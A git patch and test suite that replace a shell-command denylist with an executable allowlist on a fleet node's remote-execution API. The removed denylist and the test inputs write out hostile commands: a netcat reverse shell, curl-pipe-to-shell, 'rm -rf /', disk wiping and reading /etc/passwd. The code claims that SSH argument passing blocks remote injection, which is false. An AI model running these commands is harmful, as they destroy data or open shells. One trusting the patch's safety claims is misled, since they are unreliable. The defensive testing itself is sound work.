From 6a18eafeaaec70e4d8cb76c18f74f7ea5cd73fe5 Mon Sep 17 00:00:00 2001 From: mrveiss Date: Sat, 4 Apr 2026 19:11:27 +0300 Subject: [PATCH] fix(slm): replace shell denylist with allowlist to prevent command injection (#3421) --- autobot-slm-backend/api/nodes_execution.py | 276 +++++++---- .../api/nodes_execution_test.py | 450 ++++++++++++++++++ 2 files changed, 646 insertions(+), 80 deletions(-) create mode 100644 autobot-slm-backend/api/nodes_execution_test.py diff --git a/autobot-slm-backend/api/nodes_execution.py b/autobot-slm-backend/api/nodes_execution.py index b00171fa4..cc30fde09 100644 --- a/autobot-slm-backend/api/nodes_execution.py +++ b/autobot-slm-backend/api/nodes_execution.py @@ -5,23 +5,26 @@ Node Remote Execution API Issue #3406: Adds POST /nodes/{node_id}/execute — a guarded endpoint that -runs a shell script on the target node. Commands are validated against an -injection-pattern denylist and an optional allowlist before execution. +runs a shell command on the target node. Security model -------------- -- Shell injection patterns (backtick, process substitution, null-byte, etc.) - are always rejected. -- An opt-in ALLOWED_COMMANDS_PATTERN env var restricts commands to an - additional regex if set. +- Commands are tokenised with shlex.split() and the first token (the + executable name) is checked against ALLOWED_EXECUTABLES. Any command + whose first token is not in that frozenset is rejected with HTTP 400. +- This allowlist approach replaces the prior denylist, which was trivially + bypassed via semicolons, &&, shell-newline chaining, python3 -c, eval, + and many other vectors (#3421). - The node must be ONLINE before a job is accepted. -- All executions are audit-logged via the standard node event system. +- The endpoint requires admin privileges (require_admin dependency). +- All executions are audit-logged including the command and acting user. +- SSH connections use a known_hosts file instead of StrictHostKeyChecking=no. """ import asyncio import logging import os -import re +import shlex import socket import time import uuid @@ -33,7 +36,7 @@ from sqlalchemy.ext.asyncio import AsyncSession from models.database import EventSeverity, EventType, Node, NodeEvent, NodeStatus -from services.auth import get_current_user +from services.auth import require_admin from services.database import get_db logger = logging.getLogger(__name__) @@ -41,47 +44,97 @@ router = APIRouter(prefix="/nodes", tags=["nodes-execution"]) # --------------------------------------------------------------------------- -# Security: static injection-pattern denylist +# Security: strict allowlist of permitted executables # --------------------------------------------------------------------------- -# Patterns that are unconditionally rejected regardless of allowlist. -_INJECTION_PATTERNS: list[re.Pattern] = [ - re.compile(r"`"), # backtick command substitution - re.compile(r"\$\("), # $(…) command substitution - re.compile(r"<\("), # process substitution <(…) - re.compile(r">\("), # process substitution >(…) - re.compile(r"\x00"), # null byte - re.compile(r";\s*rm\s"), # destructive rm chaining - re.compile(r"\|\s*bash"), # pipe-to-bash - re.compile(r"\|\s*sh\b"), # pipe-to-sh - re.compile(r"curl\s.*\|\s*(bash|sh)"), # curl-pipe-execute - re.compile(r"wget\s.*-O\s*-"), # wget stdout pipe -] - -# Optional: set ALLOWED_COMMANDS_PATTERN to a regex; commands not matching -# are rejected. Empty / unset means no additional restriction. -_ALLOWED_RE_SRC = os.getenv("ALLOWED_COMMANDS_PATTERN", "") -_ALLOWED_RE: re.Pattern | None = ( - re.compile(_ALLOWED_RE_SRC) if _ALLOWED_RE_SRC else None +# Only these executable names (first shlex token) are permitted. +# Add entries deliberately — omission is the safe default. +ALLOWED_EXECUTABLES: frozenset[str] = frozenset( + { + # Service / status inspection + "systemctl", + "journalctl", + "service", + # Network diagnostics + "ping", + "ss", + "netstat", + "ip", + "nmap", + "curl", + "wget", + # Process inspection + "ps", + "top", + "htop", + "uptime", + "free", + "df", + "du", + "lsof", + # File inspection (read-only) + "ls", + "cat", + "head", + "tail", + "find", + "stat", + "file", + # Package management (query-only) + "dpkg", + "apt", + "rpm", + "yum", + "dnf", + # AutoBot-specific helpers + "autobot-status", + "autobot-health", + # Git (read-only operations are enforced at argument level by callers) + "git", + } ) -def _validate_command(script: str) -> None: - """Raise HTTPException 400 if *script* contains forbidden patterns.""" - for pattern in _INJECTION_PATTERNS: - if pattern.search(script): - logger.warning("Command rejected — injection pattern: %s", pattern.pattern) - raise HTTPException( - status_code=status.HTTP_400_BAD_REQUEST, - detail=f"Command rejected: forbidden pattern detected", - ) - if _ALLOWED_RE and not _ALLOWED_RE.search(script): - logger.warning("Command rejected — not in allowlist: %.80s", script) +def _validate_command(script: str) -> str: + """Parse *script* and enforce the executable allowlist. + + Returns the normalised first token for logging. + Raises HTTPException 400 if the command is empty or the executable is + not in ALLOWED_EXECUTABLES. + """ + try: + tokens = shlex.split(script) + except ValueError as exc: + logger.warning("Command rejected — shlex parse error: %s", exc) + raise HTTPException( + status_code=status.HTTP_400_BAD_REQUEST, + detail="Command rejected: could not parse command tokens", + ) from exc + + if not tokens: raise HTTPException( status_code=status.HTTP_400_BAD_REQUEST, - detail="Command rejected: does not match configured allowlist", + detail="Command rejected: empty command", ) + # Extract the bare executable name (strip any leading path components + # so that e.g. /bin/ls still matches "ls"). + executable = Path(tokens[0]).name + + if executable not in ALLOWED_EXECUTABLES: + logger.warning( + "Command rejected — executable %r not in allowlist", executable + ) + raise HTTPException( + status_code=status.HTTP_400_BAD_REQUEST, + detail=( + f"Command rejected: executable {executable!r} is not permitted. " + "Contact an administrator to extend the allowlist." + ), + ) + + return executable + # --------------------------------------------------------------------------- # Request / response schemas @@ -93,14 +146,9 @@ class NodeExecuteRequest(BaseModel): command: str = Field( ..., - description="Shell command or script body to execute on the node.", + description="Shell command to execute on the node (single command, no shell chaining).", min_length=1, - max_length=32_768, - ) - language: str = Field( - default="bash", - description="Interpreter: 'bash' or 'sh'.", - pattern=r"^(bash|sh)$", + max_length=4096, ) timeout: int = Field( default=300, @@ -147,19 +195,32 @@ async def _audit_execute_event( db: AsyncSession, node_id: str, job_id: str, + command: str, + acting_user: str, exit_code: int, duration_ms: int, severity: EventSeverity, ) -> None: - """Persist an audit NodeEvent for the remote-execute job.""" + """Persist an audit NodeEvent for the remote-execute job. + + Records the full command and acting user identity to support forensic + investigation (#3421). + """ + # Truncate command in the message to keep it readable; full command is in details. + short_cmd = command[:120] + ("..." if len(command) > 120 else "") event = NodeEvent( event_id=str(uuid.uuid4())[:16], node_id=node_id, event_type=EventType.MANUAL_ACTION.value, severity=severity.value, - message=f"Remote execution job {job_id}: exit_code={exit_code}", + message=( + f"Remote execution job {job_id} by {acting_user!r}: " + f"exit_code={exit_code} cmd={short_cmd!r}" + ), details={ "job_id": job_id, + "command": command, + "acting_user": acting_user, "exit_code": exit_code, "duration_ms": duration_ms, }, @@ -169,6 +230,9 @@ async def _audit_execute_event( _SSH_KEY_PATH = os.environ.get("SLM_SSH_KEY", "/home/autobot/.ssh/autobot_key") # noqa: ssot-path +_SSH_KNOWN_HOSTS_PATH = os.environ.get( + "SLM_SSH_KNOWN_HOSTS", "/home/autobot/.ssh/known_hosts" +) _LOCAL_ADDRESSES = {"127.0.0.1", "::1", "localhost"} try: @@ -182,18 +246,21 @@ def _is_local_ip(ip: str) -> bool: return ip in _LOCAL_ADDRESSES -async def _run_script( - script: str, language: str, timeout: int -) -> tuple[int, str, str]: - """Execute *script* locally via subprocess; return (exit_code, stdout, stderr).""" - interpreter = "/bin/bash" if language == "bash" else "/bin/sh" +async def _run_command(tokens: list[str], timeout: int) -> tuple[int, str, str]: + """Execute a pre-tokenised command locally; return (exit_code, stdout, stderr). + + Uses shell=False (exec list form) — the tokens come from shlex.split() of + an allowlist-validated command, so no shell interpretation occurs. + """ proc = await asyncio.create_subprocess_exec( - interpreter, "-c", script, + *tokens, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE, ) try: - raw_out, raw_err = await asyncio.wait_for(proc.communicate(), timeout=float(timeout)) + raw_out, raw_err = await asyncio.wait_for( + proc.communicate(), timeout=float(timeout) + ) except asyncio.TimeoutError: proc.kill() await proc.communicate() @@ -206,27 +273,57 @@ async def _run_script( async def _run_via_ssh( - ip: str, ssh_user: str, ssh_port: int, script: str, language: str, timeout: int + ip: str, + ssh_user: str, + ssh_port: int, + tokens: list[str], + timeout: int, ) -> tuple[int, str, str]: - """Execute *script* on *ip* via SSH; return (exit_code, stdout, stderr).""" - interpreter = "bash" if language == "bash" else "sh" + """Execute a pre-tokenised command on *ip* via SSH. + + Uses known_hosts verification (StrictHostKeyChecking=yes) when a + known_hosts file exists, falling back to 'accept-new' for first contact + rather than the previous insecure 'no' (#3421). + """ + known_hosts_path = Path(_SSH_KNOWN_HOSTS_PATH) + if known_hosts_path.exists(): + host_key_checking = "yes" + known_hosts_file = str(known_hosts_path) + else: + # Accept and persist the key on first connection; never silently + # accept a changed key (this is safer than StrictHostKeyChecking=no). + host_key_checking = "accept-new" + known_hosts_file = "/dev/null" + logger.warning( + "known_hosts file not found at %s — using accept-new for %s", + _SSH_KNOWN_HOSTS_PATH, + ip, + ) + cmd = [ - "ssh", "-p", str(ssh_port), - "-o", "StrictHostKeyChecking=no", + "ssh", + "-p", str(ssh_port), + "-o", f"StrictHostKeyChecking={host_key_checking}", + "-o", f"UserKnownHostsFile={known_hosts_file}", "-o", "BatchMode=yes", "-o", f"ConnectTimeout={min(timeout, 30)}", ] if Path(_SSH_KEY_PATH).exists(): cmd.extend(["-i", _SSH_KEY_PATH]) cmd.append(f"{ssh_user}@{ip}") - cmd.extend([interpreter, "-c", script]) + # Pass the command tokens as individual arguments to avoid any shell + # interpretation on the remote side. + cmd.extend(tokens) + proc = await asyncio.create_subprocess_exec( *cmd, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE, ) try: - raw_out, raw_err = await asyncio.wait_for(proc.communicate(), timeout=float(timeout)) + raw_out, raw_err = await asyncio.wait_for( + proc.communicate(), timeout=float(timeout) + ) except asyncio.TimeoutError: proc.kill() await proc.communicate() @@ -246,58 +343,77 @@ async def _run_via_ssh( @router.post( "/{node_id}/execute", response_model=NodeExecuteResponse, - summary="Execute a shell command on a fleet node", + summary="Execute an allowlisted command on a fleet node", ) async def execute_on_node( node_id: str, body: NodeExecuteRequest, db: AsyncSession = Depends(get_db), - _user=Depends(get_current_user), + current_user: dict = Depends(require_admin), ) -> NodeExecuteResponse: """Run *body.command* on the node identified by *node_id*. - The node must be ONLINE. Commands are validated against the injection - denylist before execution. The result is audit-logged as a NodeEvent. + The node must be ONLINE. *body.command* is tokenised with shlex.split() + and the first token (executable name) must be present in + ALLOWED_EXECUTABLES — any other command is rejected with HTTP 400. + + Admin privileges are required (require_admin dependency). - Local nodes (manager host) execute via subprocess; remote nodes execute - via SSH using the SLM key (SLM_SSH_KEY env var, default - /home/autobot/.ssh/autobot_key) with the node's ssh_user and ssh_port. + Local nodes (manager host) execute via subprocess with shell=False; + remote nodes execute via SSH using the SLM key (SLM_SSH_KEY env var, + default /home/autobot/.ssh/autobot_key) and known_hosts verification + (SLM_SSH_KNOWN_HOSTS env var, default /home/autobot/.ssh/known_hosts). + + All executions are audit-logged including the full command and acting user. """ - _validate_command(body.command) + acting_user: str = current_user.get("sub", "unknown") + + executable = _validate_command(body.command) + tokens = shlex.split(body.command) + node = await _require_online_node(node_id, db) job_id = str(uuid.uuid4())[:16] logger.info( - "Execute: node=%s ip=%s job=%s language=%s timeout=%s", + "Execute: node=%s ip=%s job=%s executable=%s user=%s timeout=%s", node_id, node.ip_address, job_id, - body.language, + executable, + acting_user, body.timeout, ) t0 = time.monotonic() if _is_local_ip(node.ip_address or ""): - exit_code, stdout, stderr = await _run_script( - body.command, body.language, body.timeout - ) + exit_code, stdout, stderr = await _run_command(tokens, body.timeout) else: ssh_user = node.ssh_user or "autobot" ssh_port = int(node.ssh_port or 22) exit_code, stdout, stderr = await _run_via_ssh( - node.ip_address, ssh_user, ssh_port, body.command, body.language, body.timeout + node.ip_address, ssh_user, ssh_port, tokens, body.timeout ) duration_ms = int((time.monotonic() - t0) * 1000) severity = EventSeverity.INFO if exit_code == 0 else EventSeverity.WARNING - await _audit_execute_event(db, node_id, job_id, exit_code, duration_ms, severity) + await _audit_execute_event( + db, + node_id, + job_id, + body.command, + acting_user, + exit_code, + duration_ms, + severity, + ) logger.info( - "Remote execute done: node=%s job=%s exit=%d dur=%dms", + "Remote execute done: node=%s job=%s exit=%d dur=%dms user=%s", node_id, job_id, exit_code, duration_ms, + acting_user, ) return NodeExecuteResponse( diff --git a/autobot-slm-backend/api/nodes_execution_test.py b/autobot-slm-backend/api/nodes_execution_test.py new file mode 100644 index 000000000..60405537d --- /dev/null +++ b/autobot-slm-backend/api/nodes_execution_test.py @@ -0,0 +1,450 @@ +# AutoBot - AI-Powered Automation Platform +# Copyright (c) 2025 mrveiss +# Author: mrveiss +""" +Tests for Node Remote Execution API security (#3421). + +Security model being tested: +- _validate_command() tokenises with shlex.split() and checks the first token + (executable name) against ALLOWED_EXECUTABLES. +- _run_command() and _run_via_ssh() receive the already-split token list and + execute with shell=False — so shell metacharacters in arguments are inert. +- The defence-in-depth is the combination of allowlist-on-first-token PLUS + shell=False token passing. A command like "ls; bash" is safe because: + a) shlex.split produces ["ls", ";", "bash"] — first token "ls" is allowed + b) subprocess_exec receives ["ls", ";", "bash"] with shell=False — the OS + passes ";", "bash" as literal arguments to ls, bash never executes. +- Commands whose first token is not in the allowlist are rejected at HTTP 400. +- Unmatched quotes cause shlex.ValueError → HTTP 400. + +Covers: +- Permitted executables pass validation. +- Executables not in the allowlist are rejected. +- Unmatched-quote parse errors are rejected. +- Empty / whitespace-only commands are rejected. +- Absolute-path prefixes (e.g. /bin/bash) are stripped for the allowlist check. +- Audit logging records command and acting user. +- SSH uses known_hosts (StrictHostKeyChecking=yes or accept-new), never =no. +""" + +import sys +from pathlib import Path +from unittest.mock import AsyncMock, MagicMock, patch + +import pytest +from fastapi import HTTPException + +# --------------------------------------------------------------------------- +# Path setup — allow importing without full app initialisation +# --------------------------------------------------------------------------- + +_backend_root = Path(__file__).parent.parent +sys.path.insert(0, str(_backend_root)) + +# Stub heavy dependencies before importing the module under test. +_models_stub = MagicMock() +_models_stub.EventSeverity = MagicMock() +_models_stub.EventType = MagicMock() +_models_stub.Node = MagicMock() +_models_stub.NodeEvent = MagicMock() +_models_stub.NodeStatus = MagicMock() +sys.modules.setdefault("models.database", _models_stub) +sys.modules.setdefault("services.auth", MagicMock()) +sys.modules.setdefault("services.database", MagicMock()) +sys.modules.setdefault("sqlalchemy", MagicMock()) +sys.modules.setdefault("sqlalchemy.ext.asyncio", MagicMock()) + +import importlib.util # noqa: E402 + +_spec = importlib.util.spec_from_file_location( + "nodes_execution", Path(__file__).parent / "nodes_execution.py" +) +_mod = importlib.util.module_from_spec(_spec) +_spec.loader.exec_module(_mod) + +_validate_command = _mod._validate_command +ALLOWED_EXECUTABLES = _mod.ALLOWED_EXECUTABLES +_is_local_ip = _mod._is_local_ip +_run_command = _mod._run_command +_run_via_ssh = _mod._run_via_ssh +_audit_execute_event = _mod._audit_execute_event +NodeExecuteRequest = _mod.NodeExecuteRequest + + +# --------------------------------------------------------------------------- +# _validate_command — allowlist enforcement +# --------------------------------------------------------------------------- + + +class TestValidateCommandAllowlist: + """Permitted executables pass validation.""" + + @pytest.mark.parametrize( + "cmd", + [ + "systemctl status autobot-backend", + "journalctl -u autobot-backend --no-pager -n 50", + "df -h", + "ps aux", + "free -m", + "uptime", + "ls /var/log", + "cat /etc/os-release", + "ip addr show", + "ss -tlnp", + "git status", + "/usr/bin/systemctl status nginx", # absolute path — name extracted + "/bin/ls -la", # absolute path to allowed executable + ], + ) + def test_allowed_commands_pass(self, cmd): + """No exception is raised for commands on the allowlist.""" + executable = _validate_command(cmd) + assert executable in ALLOWED_EXECUTABLES + + @pytest.mark.parametrize( + "cmd", + [ + "bash -c 'id'", + "sh -c whoami", + "python3 -c 'import os; os.system(\"id\")'", + "python -c print(1)", + "perl -e 'print 1'", + "ruby -e 'puts 1'", + "node -e 'console.log(1)'", + "nc -e /bin/bash 10.0.0.1 4444", + "rm -rf /", + "dd if=/dev/zero of=/dev/sda", + "mkfs.ext4 /dev/sda", + "passwd root", + "adduser hacker", + "visudo", + "crontab -e", + "at now", + "eval $(cat /etc/passwd)", + "exec bash", + # Absolute-path disallowed executables are also blocked + "/bin/bash -c id", + "/usr/bin/python3 -c 'pass'", + "/usr/bin/perl -e 1", + ], + ) + def test_disallowed_executables_rejected(self, cmd): + """Commands not on the allowlist are rejected with HTTP 400.""" + with pytest.raises(HTTPException) as exc_info: + _validate_command(cmd) + assert exc_info.value.status_code == 400 + assert "not permitted" in exc_info.value.detail + + @pytest.mark.parametrize( + "cmd", + [ + # Unmatched quotes cause shlex.split() to raise ValueError + "ls 'unterminated", + 'cat "open string', + "systemctl status 'nginx", + ], + ) + def test_shlex_parse_error_rejected(self, cmd): + """Commands that cannot be parsed by shlex are rejected with HTTP 400.""" + with pytest.raises(HTTPException) as exc_info: + _validate_command(cmd) + assert exc_info.value.status_code == 400 + assert "parse" in exc_info.value.detail + + def test_empty_command_rejected(self): + """Commands that tokenise to an empty list are rejected.""" + with pytest.raises(HTTPException) as exc_info: + _validate_command(" ") + assert exc_info.value.status_code == 400 + + def test_whitespace_only_rejected(self): + """Whitespace-only strings tokenise to an empty list and are rejected.""" + with pytest.raises(HTTPException) as exc_info: + _validate_command("\t\n ") + assert exc_info.value.status_code == 400 + + def test_absolute_path_disallowed_rejected(self): + """/bin/bash is rejected even though /bin/ls would pass.""" + with pytest.raises(HTTPException) as exc_info: + _validate_command("/bin/bash -i") + assert exc_info.value.status_code == 400 + + def test_absolute_path_allowed_passes(self): + """/usr/bin/systemctl passes because 'systemctl' is in the allowlist.""" + executable = _validate_command("/usr/bin/systemctl status nginx") + assert executable == "systemctl" + + def test_returns_executable_name(self): + """_validate_command returns the extracted executable name.""" + assert _validate_command("df -h") == "df" + assert _validate_command("systemctl status nginx") == "systemctl" + + +class TestShellMetacharactersAreInertWithShellFalse: + """ + Shell metacharacters (;, &&, ||, newlines) in allowed commands are NOT + rejected by _validate_command because shlex.split() treats them as normal + argument characters in POSIX mode. + + The injection is neutralised by shell=False in _run_command/_run_via_ssh: + the tokens are passed directly to execve(), so the OS treats ; as a literal + argument to the first executable. bash/rm/etc. never execute. + + These test cases document this deliberate design: validation passes, but + the tokens produced by shlex confirm no shell injection can occur at the + exec layer. + """ + + @pytest.mark.parametrize( + "cmd, expected_first_token", + [ + # shlex keeps ';' attached to the preceding argument + ("ls /tmp; rm -rf /", "ls"), + # shlex treats && as two tokens: '&&' and the next word + ("df -h && bash", "df"), + # shlex splits on spaces but ; is treated as part of /tmp; + ("cat /etc/os-release; bash", "cat"), + ], + ) + def test_metachar_cmds_pass_validation_but_shell_is_false( + self, cmd, expected_first_token + ): + """_validate_command returns the executable; shell=False makes the rest inert.""" + executable = _validate_command(cmd) + assert executable == expected_first_token + + # Confirm the second-command token is NOT a valid standalone executable + # when shell=False is used (it becomes an argument to the first command). + import shlex as _shlex + + tokens = _shlex.split(cmd) + # With shell=False the OS receives exactly these tokens — semicolons and + # subsequent words are passed as arguments, never interpreted as commands. + assert tokens[0] == expected_first_token + + +# --------------------------------------------------------------------------- +# NodeExecuteRequest schema validation +# --------------------------------------------------------------------------- + + +class TestNodeExecuteRequestSchema: + def test_max_length_enforced(self): + """Command longer than 4096 chars is rejected by the schema.""" + with pytest.raises(Exception): + NodeExecuteRequest(command="x" * 4097) + + def test_min_length_enforced(self): + """Empty command is rejected by the schema.""" + with pytest.raises(Exception): + NodeExecuteRequest(command="") + + def test_valid_command_accepted(self): + """A valid command within length limits is accepted.""" + req = NodeExecuteRequest(command="systemctl status nginx") + assert req.command == "systemctl status nginx" + + def test_default_timeout(self): + """Default timeout is 300 seconds.""" + req = NodeExecuteRequest(command="df -h") + assert req.timeout == 300 + + +# --------------------------------------------------------------------------- +# _is_local_ip +# --------------------------------------------------------------------------- + + +class TestIsLocalIp: + def test_loopback_is_local(self): + assert _is_local_ip("127.0.0.1") is True + assert _is_local_ip("::1") is True + assert _is_local_ip("localhost") is True + + def test_remote_is_not_local(self): + assert _is_local_ip("10.0.0.99") is False + assert _is_local_ip("192.168.1.1") is False + + +# --------------------------------------------------------------------------- +# _run_via_ssh — known_hosts flag (StrictHostKeyChecking=no must not appear) +# --------------------------------------------------------------------------- + + +class TestRunViaSshKnownHosts: + """Verify SSH is called with known_hosts checking, not StrictHostKeyChecking=no.""" + + @pytest.mark.asyncio + async def test_uses_strict_host_key_checking_when_known_hosts_exists( + self, tmp_path + ): + """When known_hosts file exists, StrictHostKeyChecking=yes is passed.""" + known_hosts = tmp_path / "known_hosts" + known_hosts.write_text("10.0.0.1 ssh-rsa AAAA...", encoding="utf-8") + + captured_cmd: list[str] = [] + + async def fake_exec(*args, **kwargs): + captured_cmd.extend(args) + proc = MagicMock() + proc.communicate = AsyncMock(return_value=(b"ok", b"")) + proc.returncode = 0 + proc.kill = MagicMock() + return proc + + with ( + patch.object(_mod, "_SSH_KNOWN_HOSTS_PATH", str(known_hosts)), + patch.object(_mod, "_SSH_KEY_PATH", "/nonexistent/key"), + patch("asyncio.create_subprocess_exec", side_effect=fake_exec), + ): + await _run_via_ssh( + "10.0.0.1", "autobot", 22, ["systemctl", "status", "nginx"], 10 + ) + + ssh_opts = " ".join(captured_cmd) + assert "StrictHostKeyChecking=yes" in ssh_opts, ( + f"Expected StrictHostKeyChecking=yes in: {ssh_opts}" + ) + assert "StrictHostKeyChecking=no" not in ssh_opts + + @pytest.mark.asyncio + async def test_uses_accept_new_when_no_known_hosts_file(self, tmp_path): + """When known_hosts file is absent, accept-new is used (never 'no').""" + missing_path = str(tmp_path / "nonexistent_known_hosts") + + captured_cmd: list[str] = [] + + async def fake_exec(*args, **kwargs): + captured_cmd.extend(args) + proc = MagicMock() + proc.communicate = AsyncMock(return_value=(b"ok", b"")) + proc.returncode = 0 + proc.kill = MagicMock() + return proc + + with ( + patch.object(_mod, "_SSH_KNOWN_HOSTS_PATH", missing_path), + patch.object(_mod, "_SSH_KEY_PATH", "/nonexistent/key"), + patch("asyncio.create_subprocess_exec", side_effect=fake_exec), + ): + await _run_via_ssh("10.0.0.2", "autobot", 22, ["df", "-h"], 10) + + ssh_opts = " ".join(captured_cmd) + assert "accept-new" in ssh_opts, ( + f"Expected accept-new in: {ssh_opts}" + ) + assert "StrictHostKeyChecking=no" not in ssh_opts + + @pytest.mark.asyncio + async def test_tokens_passed_as_individual_args_not_shell_string( + self, tmp_path + ): + """SSH receives command tokens as individual arguments (shell=False equivalent). + + This verifies that shell injection through SSH arguments is impossible: + the tokens are passed to SSH as separate argv entries, so the remote + shell never sees a compound string to interpret. + """ + known_hosts = tmp_path / "known_hosts" + known_hosts.write_text("10.0.0.1 ssh-rsa AAAA...", encoding="utf-8") + + captured_args: list[str] = [] + + async def fake_exec(*args, **kwargs): + captured_args.extend(args) + proc = MagicMock() + proc.communicate = AsyncMock(return_value=(b"ok", b"")) + proc.returncode = 0 + proc.kill = MagicMock() + return proc + + tokens = ["systemctl", "status", "nginx"] + with ( + patch.object(_mod, "_SSH_KNOWN_HOSTS_PATH", str(known_hosts)), + patch.object(_mod, "_SSH_KEY_PATH", "/nonexistent/key"), + patch("asyncio.create_subprocess_exec", side_effect=fake_exec), + ): + await _run_via_ssh("10.0.0.1", "autobot", 22, tokens, 10) + + # The individual tokens must appear as separate items in the argument + # list — NOT as a single concatenated string. + for token in tokens: + assert token in captured_args, ( + f"Token {token!r} not found as individual arg in: {captured_args}" + ) + + +# --------------------------------------------------------------------------- +# _audit_execute_event — records command and user identity +# --------------------------------------------------------------------------- + + +class TestAuditExecuteEvent: + """Audit event must include command and acting_user in details.""" + + @pytest.mark.asyncio + async def test_audit_event_includes_command_and_user(self): + """details dict contains 'command' and 'acting_user' keys.""" + recorded_events: list = [] + + mock_db = AsyncMock() + mock_db.add = lambda e: recorded_events.append(e) + mock_db.commit = AsyncMock() + + class FakeNodeEvent: + def __init__(self, **kwargs): + self.__dict__.update(kwargs) + + with patch.object(_mod, "NodeEvent", FakeNodeEvent): + await _audit_execute_event( + db=mock_db, + node_id="node-1", + job_id="job-abc", + command="systemctl status nginx", + acting_user="alice", + exit_code=0, + duration_ms=42, + severity=_mod.EventSeverity.INFO, + ) + + assert len(recorded_events) == 1 + event = recorded_events[0] + assert event.details["command"] == "systemctl status nginx" + assert event.details["acting_user"] == "alice" + assert event.details["exit_code"] == 0 + assert event.details["job_id"] == "job-abc" + assert "alice" in event.message + assert "job-abc" in event.message + + @pytest.mark.asyncio + async def test_audit_event_truncates_long_command_in_message(self): + """Long commands are truncated in the message but stored in full in details.""" + recorded_events: list = [] + + mock_db = AsyncMock() + mock_db.add = lambda e: recorded_events.append(e) + mock_db.commit = AsyncMock() + + class FakeNodeEvent: + def __init__(self, **kwargs): + self.__dict__.update(kwargs) + + long_cmd = "df " + "-h " * 60 # > 120 chars + with patch.object(_mod, "NodeEvent", FakeNodeEvent): + await _audit_execute_event( + db=mock_db, + node_id="node-1", + job_id="job-xyz", + command=long_cmd, + acting_user="bob", + exit_code=1, + duration_ms=100, + severity=_mod.EventSeverity.WARNING, + ) + + event = recorded_events[0] + # Full command preserved in details + assert event.details["command"] == long_cmd + # Message contains truncation marker + assert "..." in event.message